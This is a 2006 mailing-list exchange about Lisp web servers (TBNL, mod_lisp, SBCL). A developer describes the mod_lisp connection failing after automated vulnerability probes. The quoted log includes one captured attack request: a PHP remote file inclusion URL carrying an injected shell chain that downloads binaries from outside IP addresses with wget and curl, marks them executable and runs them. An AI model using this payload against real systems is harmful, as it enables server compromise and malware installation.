[tbnl-devel] tbnl/mod_lisp disconnection?
Zach Beane
xach at xach.com
Mon Apr 24 14:01:33 UTC 2006
On Fri, Apr 21, 2006 at 11:05:27PM +0200, Edi Weitz wrote:
> Hi Zach!
>
> On Wed, 5 Apr 2006 09:47:11 -0400, Zach Beane <xach at xach.com> wrote:
>
> > Every now and then I get hit by a sudden probe of various web script
> > vulnerabilities. The requests look like this:
> >
> > POST /xmlrpc/xmlrpc.php
> > POST /blogs/xmlsrv/xmlrpc.php
> > GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|
> >
> > After these things happen, the connection between mod_lisp and tbnl
> > starts to fail with this message in the apache logs:
> >
> > [Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
> > [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
> >
> > Making requests to the website results in a 500 Internal Server Error.
> >
> > I have looked at the listener object when this happens, and it seems
> > to have 10 workers. After a few more requests (all 500 errors), the
> > worker count drops down, and then suddenly things start working
> > normally again.
> >
> > What might be happening with the connection in this situation? Is
> > there anything in the listener object I can inspect to discover why
> > the mod_lisp connection is getting EOF?
>
> Sorry for the loooooong delay. I'm /really/ busy... :)
>
> Have you made any progress with this? I've tried to reproduce it (LWL
> and Apache 2) but everything worked fine. Which Lisp are you using?
I am using SBCL. I can't reproduce it either; it only seems to happen
after that particular style of attack.
On the other hand, I recently announced a new toy
(http://wigflip.com/saywhat/) and it got a few thousand visitors in a
short period of time. Things wedged a few times in a completely
different style, but again I am unable to reproduce, which makes
troubleshooting very difficult.
> ATM I don't really have an idea how to tackle this. Sometimes, when I
> was really desperate, I've hacked the mod_lisp C code to debug
> problems like this one, but that isn't fun. Actually, that was one of
> the reasons I wrote Hunchentoot...
I'm thinking of going in a similar direction.
Zach
More information about the Tbnl-devel
mailing list